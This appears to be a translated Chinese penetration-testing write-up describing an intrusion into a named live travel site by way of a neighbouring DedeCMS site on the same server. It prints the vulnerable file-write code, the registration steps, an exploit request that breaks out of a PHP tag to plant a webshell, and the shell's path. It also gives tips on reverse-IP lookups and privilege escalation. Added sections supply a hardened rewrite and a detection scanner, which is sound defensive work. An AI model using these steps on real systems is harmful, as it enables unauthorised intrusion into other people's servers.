[Bkjia.com exclusive article] Hello everyone, I haven't written a penetration-testing write-up in a long time. Today a friend asked me to check a website, so I'll share the assessment process with you; I hope you learn something from it. Let's begin.
I. Going straight in
The target today is China Outdoor Tourism Network. The website is published on. Let's look at the site structure first: it has forums, blogs, a link directory (网址大全), air tickets, hotels, vacations and a few other modules. The forum runs Discuz! 6.0 (dz6.0). I've heard there is a 0day for dz6.0, but unfortunately I'm a poor man who can't afford to buy 0days, so after looking at the forum I can't start there. Next the blog program: it doesn't open at all. Speechless. The link directory: nothing found either. The three modules for air tickets, hotels and vacations all just link to Ctrip. Speechless again. That leaves only the site's own news system. I went through every static page the news system generates and couldn't identify which program it uses. So going straight in isn't going to work; let's look at the other websites on the same server instead.
II. Taking the side road
First, check how many websites are on this server. The server's IP address is 222.216.28.235. Using the IP-to-domain (reverse IP) lookup at http://www.seologs.com/, we learn that the server hosts 5 sites.
That lookup site was unavailable for a while because too many people in China were querying it, and it blocked domestic IP addresses. If you can't reach it, query through a foreign proxy IP.
In my experience, a server with only five sites is usually operated and maintained by the site builder himself. Permission settings on this kind of server are far looser than on a virtual host carrying hundreds of domains, so privilege escalation also succeeds more often. When the lookup instead shows a virtual host with hundreds of domains, work on the main site and find a way in there directly, because getting from a neighbouring site to the main site's permissions is hard. The side-site approach (旁注, attacking a neighbour on the same server) is the method of last resort, for when the main site can't be taken head-on. Remember that.
Let's look more closely at 51maihuo.com and uutxx.com. Opening them shows that both domain names point to the same site, a food-related website. A quick look found nothing, and I couldn't work out what program it runs. At this point I was pretty depressed. After a while I figured there shouldn't be only two sites on this server, so I switched to another IP-to-domain lookup, http://www.114best.com/. Its result shows that besides those two sites the server hosts one more.
That site is http://www.travelren.net, which mainly introduces travel routes and tourist attractions. Its layout looked familiar; it seemed to be DedeCMS (织梦, the "zhimeng" content management system). Appending /member to the URL brings up a user login box.
It was indeed DedeCMS. DedeCMS had a hole recently that I had tested several times locally, which is why the layout looked so familiar. The recently disclosed vulnerability is a file write-in (arbitrary file write), with the precondition that the site has the membership system enabled and has a serialized-story (book) category in its library. The vulnerable code is in include/inc_bookfunctions.php:
    function WriteBookText($cid,$body)
    {
        global $cfg_cmspath,$cfg_basedir;
        $ipath = $cfg_cmspath."/data/textdata";
        // chapters are bucketed 5000 per sub-directory
        $tpath = ceil($cid/5000);
        if(!is_dir($cfg_basedir.$ipath)) MkdirAll($cfg_basedir.$ipath,$GLOBALS['cfg_dir_purview']);
        if(!is_dir($cfg_basedir.$ipath.'/'.$tpath)) MkdirAll($cfg_basedir.$ipath.'/'.$tpath,$GLOBALS['cfg_dir_purview']);
        // the chapter is stored as a .php file under the web root
        $bookfile = $cfg_basedir.$ipath."/{$tpath}/bk{$cid}.php";
        // user-supplied text is wrapped in a PHP open/close tag as-is
        $body = "<"."?php\r\n".$body."\r\n?".">";
        @$fp = fopen($bookfile,'w');
        @flock($fp);
        @fwrite($fp,$body);
        @fclose($fp);
    }

And the caller, in member/story_add_content_action.php:

    WriteBookText($arcID,addslashes($body));
In this code the submitted body is only run through addslashes(), which escapes quotes and backslashes but does nothing to stop PHP code. The body is then wrapped with $body = "<"."?php\r\n".$body."\r\n?".">"; and written to a .php file under the web root, so obviously you can write a small webshell (a "pony", 小马) through it.
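As an added example (not code from the article and not DedeCMS's own fix), here is a hardened stand-in for WriteBookText() that keeps the same directory layout but never places user text inside a PHP open tag. The exit-stub file format, the ReadBookTextSafe() reader and the integer cast on $cid are my own assumptions; the article does not discuss any of them, and MkdirAll() and the $cfg_* globals are assumed to exist as in DedeCMS:

```php
<?php
// Added example, not DedeCMS code. Hardened stand-in for WriteBookText():
// same layout (data/textdata/<ceil(cid/5000)>/bk<cid>.php), but the
// user-supplied chapter text is never placed inside a PHP open tag.
// Assumed: MkdirAll() and the $cfg_* globals exist as in DedeCMS, and
// chapters are read back through ReadBookTextSafe() below.

function BookTextPath($cid)
{
    global $cfg_cmspath, $cfg_basedir;
    $tpath = ceil($cid / 5000);
    return $cfg_basedir . $cfg_cmspath . "/data/textdata/{$tpath}/bk{$cid}.php";
}

function WriteBookTextSafe($cid, $body)
{
    global $cfg_cmspath, $cfg_basedir;

    // Extra check not covered by the article: force an integer id so that
    // nothing but digits can reach the file name.
    $cid = (int)$cid;
    if ($cid <= 0) {
        return false;
    }

    $ipath = $cfg_cmspath . "/data/textdata";
    $tpath = ceil($cid / 5000);
    if (!is_dir($cfg_basedir . $ipath)) {
        MkdirAll($cfg_basedir . $ipath, $GLOBALS['cfg_dir_purview']);
    }
    if (!is_dir($cfg_basedir . $ipath . '/' . $tpath)) {
        MkdirAll($cfg_basedir . $ipath . '/' . $tpath, $GLOBALS['cfg_dir_purview']);
    }

    // The file still ends in .php (keeps the layout), but it now starts with
    // an exit stub, so a direct web request executes nothing and prints
    // nothing. The chapter itself is base64, which cannot contain "<?" or
    // "?>", so no body can close or reopen a PHP block.
    $payload = "<?php exit; ?>\n" . base64_encode($body);

    $fp = fopen(BookTextPath($cid), 'w');
    if ($fp === false) {
        return false;
    }
    flock($fp, LOCK_EX);
    $ok = (fwrite($fp, $payload) !== false);
    flock($fp, LOCK_UN);
    fclose($fp);
    return $ok;
}

// Read a chapter back: drop the stub line and decode. Escape the result for
// HTML at output time; storage no longer needs addslashes() at all.
function ReadBookTextSafe($cid)
{
    $cid = (int)$cid;
    if ($cid <= 0) {
        return false;
    }
    $raw = @file_get_contents(BookTextPath($cid));
    if ($raw === false) {
        return false;
    }
    $parts = explode("\n", $raw, 2);
    if (!isset($parts[1])) {
        return '';
    }
    return base64_decode($parts[1], true);
}
```

The caller in story_add_content_action.php would then pass the raw $body (no addslashes(), since the text never reaches a PHP parser or a SQL query on this path). The stronger fix is to keep chapter data outside the web root or under a directory the web server refuses to serve; the stub-plus-base64 form above is the minimum that makes the file harmless even when it is requested directly.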
First visit http://www.travelren.net/member/index_do.php?fmdo=user&dopost=regnew to register a new user, then log in with it. The member system has a serialized-story (book) category, so submit straight away:
http://www.hikers.cn/member/story_add_content_action.php?chapterid=1&arcID=2&body=?>
The shell is generated under the data/textdata/ directory, by default at data/textdata/1/bk1.php (the sub-directory is ceil(cid/5000), so the first 5000 chapters all land in textdata/1/). Each time someone submits through this hole the file name increments with the chapter id (bk{$cid}.php). After my test, the uploaded shell's address is.
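If you are on the defending side, the same file layout tells you where to look. The following triage script is an added example (not from the article): it walks data/textdata/<n>/bk<cid>.php under a given web root and flags any chapter file whose body breaks out of the "<?php ... ?>" wrapper or contains common shell primitives. The file layout and wrapper format are taken from the WriteBookText() code above; the indicator list and the script name are my own choices:

```php
<?php
// Added example, not from the article. Triage scan for chapter files written
// by WriteBookText(). Layout taken from the code above:
//   <webroot>/data/textdata/<n>/bk<cid>.php, content "<?php\r\n" . body . "\r\n?>".
// The indicator list in classifyBookFile() is my own choice.
// Usage: php scan_textdata.php /path/to/webroot

function classifyBookFile($path)
{
    $raw = @file_get_contents($path);
    if ($raw === false) {
        return 'unreadable';
    }
    // Anything that is not exactly wrapper + body + wrapper was not written
    // by WriteBookText() as shown, or was edited afterwards.
    if (strncmp($raw, "<?php\r\n", 7) !== 0 || substr($raw, -4) !== "\r\n?>") {
        return 'unexpected-format';
    }
    $inner = substr($raw, 7, -4);
    if ($inner === false) {
        $inner = '';
    }
    // A "?>" or "<?" inside the body closes or reopens the PHP block, so the
    // submitter, not the CMS, decides what the engine parses. This is the
    // shape of the body used in the request above.
    if (strpos($inner, '?>') !== false || strpos($inner, '<?') !== false) {
        return 'breakout';
    }
    // Even without a breakout the body sits inside a PHP block, so any
    // fragment that happens to be valid PHP runs on a direct request. Flag
    // the usual shell building blocks.
    $indicators = '/\b(eval|assert|system|passthru|shell_exec|exec|popen|proc_open|'
                . 'base64_decode|create_function|preg_replace)\s*\(|\$_(POST|GET|REQUEST|COOKIE)\b/i';
    if (preg_match($indicators, $inner)) {
        return 'suspicious';
    }
    return 'clean';
}

function scanTextData($webroot)
{
    $findings = array();
    $files = glob(rtrim($webroot, '/') . '/data/textdata/*/bk*.php');
    if ($files === false) {
        return $findings;
    }
    foreach ($files as $file) {
        $verdict = classifyBookFile($file);
        if ($verdict !== 'clean') {
            $findings[$file] = $verdict;
        }
    }
    return $findings;
}

if (PHP_SAPI === 'cli' && isset($argv[0]) && realpath($argv[0]) === __FILE__) {
    $webroot = isset($argv[1]) ? $argv[1] : '.';
    foreach (scanTextData($webroot) as $file => $verdict) {
        // Pair each hit with its mtime: the newest hit is the latest submission.
        echo date('Y-m-d H:i:s', filemtime($file)) . "\t$verdict\t$file\n";
    }
}
```

Note that a clean chapter is plain text sitting inside a PHP block, so requesting it directly produces a parse error rather than the text; the engine treats the body as code either way, which is why a breakout or a shell primitive inside it is what matters. A "breakout" hit should be followed by a check of the member account that submitted that chapter id and of the web server access log for requests to the flagged path.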